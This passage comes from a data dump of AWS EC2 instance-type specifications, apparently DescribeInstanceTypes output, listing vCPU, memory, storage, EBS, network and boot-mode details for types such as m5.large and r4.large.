{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15616}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 475, 'Disks': [{'SizeInGB': 475, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 425, 'BaselineThroughputInMBps': 53.125, 'BaselineIops': 3000, 'MaximumBandwidthInMbps': 425, 'MaximumThroughputInMBps': 53.125, 'MaximumIops': 3000}, 'NvmeSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1], 'SizeInMiB': 7680, 'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 32, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 
'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 'm3.large', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 7680}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 32, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 
'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 450, 'BaselineThroughputInMBps': 56.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 450, 'MaximumThroughputInMBps': 56.25, 'MaximumIops': 3600}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm4.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 450, 'BaselineThroughputInMBps': 56.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 450, 'MaximumThroughputInMBps': 56.25, 'MaximumIops': 3600}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 
'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': 
{'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5a.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 
'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 
'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5ad.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 
'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5d.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 
'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15360, 'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 32, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r3.large', 'CurrentGeneration': False, 'FreeTierEligible': False, 
'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 32, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15616, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 425, 'BaselineThroughputInMBps': 53.125, 'BaselineIops': 3000, 'MaximumBandwidthInMbps': 425, 'MaximumThroughputInMBps': 53.125, 'MaximumIops': 3000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Up to 10 Gigabit', 
'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r4.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15616}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 425, 'BaselineThroughputInMBps': 53.125, 'BaselineIops': 3000, 'MaximumBandwidthInMbps': 425, 'MaximumThroughputInMBps': 53.125, 'MaximumIops': 3000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, 
{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': 
[{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5a.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 
